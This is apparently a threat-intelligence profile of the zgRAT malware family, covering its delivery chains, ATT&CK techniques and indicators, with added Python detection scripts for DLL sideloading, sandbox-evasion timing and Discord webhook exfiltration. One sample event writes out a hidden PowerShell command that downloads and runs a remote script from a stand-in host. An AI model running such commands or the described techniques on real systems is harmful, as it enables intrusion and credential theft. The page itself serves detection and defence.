Mallory
Malware. Used by 1 actor

zgRAT

zgRAT is a malware family observed as the final payload in several delivery chains and is generally described as a remote access trojan. Public reporting shows it delivered through DLL sideloading, PowerShell-based chains, and companion loaders.

In one Proofpoint-observed chain, a renamed legitimate Ace Stream executable sideloaded a trojanized PYTHON27.DLL containing DOILoader, which executed an encrypted payload stored in Vos.xwtx to run zgRAT; the associated command-and-control endpoint was 84[.]32[.]41[.]163:7705. In a tax-themed campaign, a JavaScript file hosted on Microsoft Azure launched PowerShell, which executed Rhadamanthys; Rhadamanthys then downloaded and ran zgRAT. zgRAT was also delivered together with PureHVNC through DLL sideloading, with a legitimate psl.exe binary loading a trojanized libpsl-5.dll carrying 99 obfuscated exports. In the Booking.com-themed campaign active from December 2025 through March 2026, the final payloads were zgRAT and PureHVNC, giving the operators remote access, screen control, credential theft, and persistence on infected systems.

Reporting also notes the use of Discord CDN links to distribute zgRAT and of Discord webhooks to exfiltrate stolen data, including credentials, browser cookies, and cryptocurrency wallets.

zgRAT has been seen alongside, or delivered by, DOILoader, Rhadamanthys, CastleLoader, HijackLoader, Amadey, XWorm, NetSupport, Lumma Stealer, Remcos, BitRAT, Screenshotter/AHK Bot, XLoader, and PureHVNC. Activity clusters and actors named in the underlying reporting include Aggah, GrayBravo/TAG-160, and broader Proofpoint-tracked campaigns targeting hospitality, logistics, travel, and hospitality-adjacent organizations, as well as users reached through phishing and malware-delivery websites.
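The two delivery patterns above (a legitimate executable sideloading a trojanized DLL from its own directory, and an Azure-hosted JavaScript stage spawning PowerShell) are what a hunter would look for first in endpoint telemetry. The following is an added example, not code from the page or from any vendor report: it runs two rules over Sysmon-style event records. The DLL names come from the reporting above; the file paths, the trusted-directory allowlist, the command line and the event records themselves are constructed for the example.

```python
"""Hunt for the zgRAT delivery patterns over Sysmon-style event records:
a legitimate EXE sideloading a watchlisted DLL from its own directory
(PYTHON27.DLL, libpsl-5.dll, msedge_elf.dll) and a script host spawning
PowerShell. Event records below are constructed, not real telemetry."""
import ntpath

# DLL names the reporting says were trojanized and sideloaded.
SIDELOADED_DLLS = {"python27.dll", "libpsl-5.dll", "msedge_elf.dll"}

# Directories where those DLLs may legitimately live (assumed allowlist;
# extend it from your software inventory, e.g. a genuine C:\Python27).
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",
    r"c:\program files (x86)",
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def detect_sideload(event):
    """Sysmon EID 7 (ImageLoad): a watchlisted DLL loaded from the loading
    process's own, non-trusted directory is the sideload pattern."""
    if event.get("EventID") != 7:
        return None
    dll = _base(event["ImageLoaded"])
    if dll not in SIDELOADED_DLLS:
        return None
    dll_dir = _dir(event["ImageLoaded"])
    if dll_dir.startswith(TRUSTED_DIRS) or dll_dir != _dir(event["Image"]):
        return None
    return f"sideload: {_base(event['Image'])} loaded {dll} from {dll_dir}"


def detect_script_to_shell(event):
    """Sysmon EID 1 (ProcessCreate): wscript/cscript/mshta parent spawning
    PowerShell, the JavaScript-to-PowerShell hop in the tax-themed chain."""
    if event.get("EventID") != 1:
        return None
    parent, child = _base(event["ParentImage"]), _base(event["Image"])
    if parent in SCRIPT_HOSTS and child in SHELLS:
        return f"script-to-shell: {parent} -> {child}: {event['CommandLine']}"
    return None


def hunt(events):
    """Run every rule over every event and return the list of findings."""
    findings = []
    for ev in events:
        for rule in (detect_sideload, detect_script_to_shell):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed events. Paths and the command line are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 7,
     "Image": r"C:\Users\bob\Downloads\Rechnung DE009100019000.exe",
     "ImageLoaded": r"C:\Users\bob\Downloads\PYTHON27.DLL"},
    {"EventID": 7,
     "Image": r"C:\Users\bob\AppData\Local\Temp\psl.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\libpsl-5.dll"},
    {"EventID": 7,  # genuine Edge loading its own msedge_elf.dll: benign
     "Image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "ImageLoaded": r"C:\Program Files\Microsoft\Edge\Application\msedge_elf.dll"},
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iwr https://example.invalid/s.ps1 | iex\""},
    {"EventID": 1,  # an admin opening PowerShell from Explorer: benign
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The sideload rule deliberately requires the DLL to sit in the same directory as the executable, since that is what makes the search-order hijack work; a genuine Python 2.7 installed at C:\Python27 would still trigger it, so either add such paths to the allowlist or add an Authenticode check on the DLL (the trojanized copies are unsigned, the legitimate host binaries are signed).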


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

Aggah

This PowerShell script ran Rhadamanthys malware. Rhadamanthys was then observed to download and run zgRAT.

Source: Proofpoint (proofpoint.com)
MITRE ATT&CK

Techniques & procedures

20 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.002 Spearphishing Link (evidence: 2)

Tactic: Initial Access. Technique: Phishing: Spearphishing Link (T1566.002). Implementation: Booking.com themed Italian spam.

Execution

5 techniques
T1059.001 PowerShell (evidence: 2)

The JavaScript called PowerShell to run a remote PowerShell script. This PowerShell script ran Rhadamanthys malware.

T1059.007 JavaScript (evidence: 1)

These messages contained URLs leading to a download of a JavaScript file hosted on Microsoft Azure. The JavaScript called PowerShell to run a remote PowerShell script.

T1204 User Execution (evidence: 2)

These messages contained URLs leading to a download of a JavaScript file hosted on Microsoft Azure. The JavaScript called PowerShell to run a remote PowerShell script.

T1204.001 Malicious Link (evidence: 1)

Tactic: Execution. Technique: User Execution: Malicious Link (T1204.001). Implementation: ClickFix/FakeCaptcha pages.

T1204.002 Malicious File (evidence: 1)

The RAR file contained the executable “Rechnung DE009100019000.exe”... When the .exe was executed, it sideloaded the included PYTHON27.DLL...

Persistence

1 technique
T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

Tactic: Persistence. Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001). Implementation: HKCU...\CurrentVersion\Run.

Privilege Escalation

1 technique
T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

Tactic: Persistence (also Privilege Escalation). Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001). Implementation: HKCU...\CurrentVersion\Run.

Defense Evasion

3 techniques
T1027.002 Software Packing (evidence: 2)

Tactic: Defense Evasion. Technique: Obfuscated Files or Information: Software Packing (T1027.002). Implementation: Donut + .NET Reactor + ZgRAT (three-layer packing).

T1036.005 Match Legitimate Resource Name or Location (evidence: 1)

Tactic: Defense Evasion. Technique: Masquerading: Match Legitimate Resource Name or Location (T1036.005). Implementation: msedge_elf.dll, libpsl-5.dll.

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Tactic: Defense Evasion. Technique: Virtualization/Sandbox Evasion (T1497). Implementation: benign API calls (catfact.ninja, httpbin.org) for timing.

Credential Access

2 techniques
T1539 Steal Web Session Cookie (evidence: 1)

According to Trellix's data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices.

T1649 Steal or Forge Authentication Certificates (evidence: 1)

According to Trellix's data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices.

Caveat: the cited evidence covers credentials, browser cookies and cryptocurrency wallets and does not mention authentication certificates, so it supports T1555 (Credentials from Password Stores) and the T1539 entry above better than T1649.

Discovery

3 techniques
T1033 System Owner/User Discovery (evidence: 1)

Tactic: Discovery. Technique: System Owner/User Discovery (T1033). Implementation: username and admin-status collection.

T1082 System Information Discovery (evidence: 1)

Tactic: Discovery. Technique: System Information Discovery (T1082). Implementation: PS1 fingerprinting (OS, model, AV products).

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Tactic: Defense Evasion (also Discovery). Technique: Virtualization/Sandbox Evasion (T1497). Implementation: benign API calls (catfact.ninja, httpbin.org) for timing.
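The T1497 entry, listed above under two tactics, describes the malware timing requests to harmless public endpoints (catfact.ninja, httpbin.org) before it talks to its real infrastructure. On the wire that leaves a recognisable sequence per process: a canary host, then a first contact with an unknown host a short time later. The block below is an added example, not code from the page or from any vendor, that correlates that sequence over Sysmon EID 3 style network events. The canary hosts and the asmweosiqsaaw[.]com C2 domain are taken from the page; the process GUIDs, image path, timestamps, the 120-second window and the known-good host list are assumptions made for the example.

```python
"""Correlate the sandbox-evasion tell: a process first contacting benign
canary hosts (catfact.ninja, httpbin.org) and then, shortly afterwards, a
host that is neither canary nor known good. Events are constructed
Sysmon EID 3 style records; the window and allowlist are assumptions."""
from datetime import datetime

CANARY_HOSTS = {"catfact.ninja", "httpbin.org"}
# Hosts the fleet is expected to talk to (assumed allowlist for the example).
KNOWN_GOOD = {"www.microsoft.com", "update.microsoft.com"} | CANARY_HOSTS
WINDOW_SECONDS = 120  # assumption: canary-to-C2 gap worth alerting on


def _t(iso_z):
    return datetime.fromisoformat(iso_z.replace("Z", "+00:00"))


def canary_then_c2(events, window=WINDOW_SECONDS):
    """Group network events by ProcessGuid and alert when a canary contact
    is followed within `window` seconds by a contact with an unknown host."""
    by_proc = {}
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        by_proc.setdefault(ev["ProcessGuid"], []).append(ev)

    alerts = []
    for evs in by_proc.values():
        last_canary = None
        for ev in evs:
            host = ev["DestinationHostname"].lower()
            if host in CANARY_HOSTS:
                last_canary = ev          # remember the most recent canary
                continue
            if last_canary is None or host in KNOWN_GOOD:
                continue
            gap = (_t(ev["UtcTime"]) - _t(last_canary["UtcTime"])).total_seconds()
            if 0 <= gap <= window:
                alerts.append({
                    "process": ev["Image"],
                    "canary": last_canary["DestinationHostname"],
                    "c2": f"{host}:{ev['DestinationPort']}",
                    "gap_s": gap,
                })
    return alerts


def _ev(ts, guid, image, host, port=443):
    return {"UtcTime": ts, "ProcessGuid": guid, "Image": image,
            "DestinationHostname": host, "DestinationPort": port}


# Constructed events. {A}: the evasion sequence. {B}: a browser that happens
# to visit a canary host and then a known-good host. {C}: C2 contact with no
# canary first (the plain IOC match belongs to a separate rule). {D}: canary
# followed by C2 but outside the window.
SUSPECT = r"C:\Users\bob\AppData\Roaming\svc.exe"     # hypothetical path
BROWSER = r"C:\Program Files\Mozilla Firefox\firefox.exe"
SAMPLE_EVENTS = [
    _ev("2025-03-04T10:00:00Z", "{A}", SUSPECT, "catfact.ninja"),
    _ev("2025-03-04T10:00:02Z", "{A}", SUSPECT, "httpbin.org"),
    _ev("2025-03-04T10:00:40Z", "{A}", SUSPECT, "asmweosiqsaaw.com"),
    _ev("2025-03-04T10:05:00Z", "{B}", BROWSER, "catfact.ninja"),
    _ev("2025-03-04T10:05:10Z", "{B}", BROWSER, "www.microsoft.com"),
    _ev("2025-03-04T10:09:00Z", "{C}", SUSPECT, "asmweosiqsaaw.com"),
    _ev("2025-03-04T10:10:00Z", "{D}", SUSPECT, "httpbin.org"),
    _ev("2025-03-04T10:20:00Z", "{D}", SUSPECT, "asmweosiqsaaw.com"),
]

if __name__ == "__main__":
    for alert in canary_then_c2(SAMPLE_EVENTS):
        print(alert)
```

This is a sequence heuristic, not an IOC match: run it alongside a direct match on the page's own indicators (the C2 domain and 84[.]32[.]41[.]163:7705), and tune the window and allowlist to your fleet, since browsers and developer tooling legitimately hit httpbin.org.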

Collection

1 technique
T1560 Archive Collected Data (evidence: 1)

If the target completed the ClickFix steps as instructed, a command was initiated to download a tar archive and run CastleLoader.

Caveat: the cited evidence describes downloading a tar archive to run CastleLoader, which is ingress tool transfer (T1105); it does not show the malware archiving data it collected.

Command and Control

3 techniques
T1071.001 Web Protocols (evidence: 1)

Tactic: Command and Control. Technique: Application Layer Protocol: Web Protocols (T1071.001). Implementation: HTTPS to asmweosiqsaaw[.]com.

T1102 Web Service (evidence: 1)

Tactic: Command and Control. Technique: Web Service (T1102). Implementation: Cloudflare-proxied C2.

T1105 Ingress Tool Transfer (evidence: 4)

This PowerShell script ran Rhadamanthys malware. Rhadamanthys was then observed to download and run zgRAT.

Exfiltration

2 techniques
T1041 Exfiltration Over C2 Channel (evidence: 1)

Tactic: Exfiltration. Technique: Exfiltration Over C2 Channel (T1041). Implementation: via the zgRAT C2 protocol.

T1567 Exfiltration Over Web Service (evidence: 1)

Discord's permanent file hosting capabilities have frequently been misused to distribute malware and exfiltrate data gathered from compromised systems using webhooks.
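The Discord abuse cited in this entry and under Credential Access has two distinct wire patterns: payload downloads from cdn.discordapp.com attachment links and exfiltration POSTs to a webhook URL. The block below is an added example, not code from the page or from Trellix, that picks both out of proxy-log lines and decodes the webhook ID, which is a Discord snowflake, into the webhook's creation time for triage. The log format, client addresses, attachment and webhook identifiers and the token are all constructed for the example; the snowflake layout and epoch are Discord's documented ones.

```python
"""Spot Discord CDN payload delivery and webhook exfiltration in web-proxy
logs, and decode webhook IDs (Discord snowflakes) to creation time.
Log lines are constructed for this example."""
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, Discord snowflake epoch

WEBHOOK_RE = re.compile(
    r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d{17,20})/([\w-]+)"
)
CDN_RE = re.compile(r"https?://cdn\.discordapp\.com/attachments/\d+/\d+/[^\s\"']+")

# Constructed proxy-log lines: time, client, method, URL, request content type.
SAMPLE_LOG = """\
2025-03-04T10:21:58Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/update.bin application/octet-stream
2025-03-04T10:22:11Z 10.0.0.5 POST https://discord.com/api/webhooks/1312568849203200000/AbCdEf-ghIjKl_MnOpQr multipart/form-data
2025-03-04T10:22:30Z 10.0.0.7 GET https://discord.com/channels/@me text/html
2025-03-04T10:23:02Z 10.0.0.5 POST https://discord.com/api/webhooks/1312568849203200000/AbCdEf-ghIjKl_MnOpQr application/json
"""


def snowflake_time(snowflake):
    """A snowflake's top 42 bits are milliseconds since the Discord epoch;
    the low 22 bits (worker, process, sequence) are shifted out."""
    ms = (int(snowflake) >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def parse_line(line):
    ts, client, method, url, ctype = line.split(maxsplit=4)
    return {"ts": ts, "client": client, "method": method, "url": url, "ctype": ctype}


def find_discord_abuse(log_text):
    """Return one finding per webhook POST or CDN attachment download."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        m = WEBHOOK_RE.search(rec["url"])
        if m and rec["method"] == "POST":
            webhook_id, token = m.groups()
            findings.append({
                "kind": "webhook_exfil",
                "client": rec["client"],
                "webhook_id": webhook_id,
                "token_prefix": token[:6],   # enough to pivot on, not to replay
                "webhook_created": snowflake_time(webhook_id).isoformat(),
                # multipart bodies are file uploads (archives of stolen data);
                # JSON bodies are usually text beacons with credentials inline
                "file_upload": rec["ctype"].startswith("multipart/form-data"),
            })
        elif CDN_RE.search(rec["url"]):
            findings.append({"kind": "cdn_download",
                             "client": rec["client"], "url": rec["url"]})
    return findings


if __name__ == "__main__":
    for f in find_discord_abuse(SAMPLE_LOG):
        print(f)
```

The webhook creation time bounds how far back to look for earlier victims posting to the same channel, and the full webhook URL is itself a credential: anyone holding it can post, so log only a prefix and report the URL to Discord so the webhook is deleted rather than reusing it.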

INDICATORS OF COMPROMISE

IOCs tracked for this family

45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network
28 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
10 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
7 tracked

Other indicator types observed in public reporting.

Sample entries: six domain indicators, each with a latest sighting 3 months ago; the values are withheld on the public page.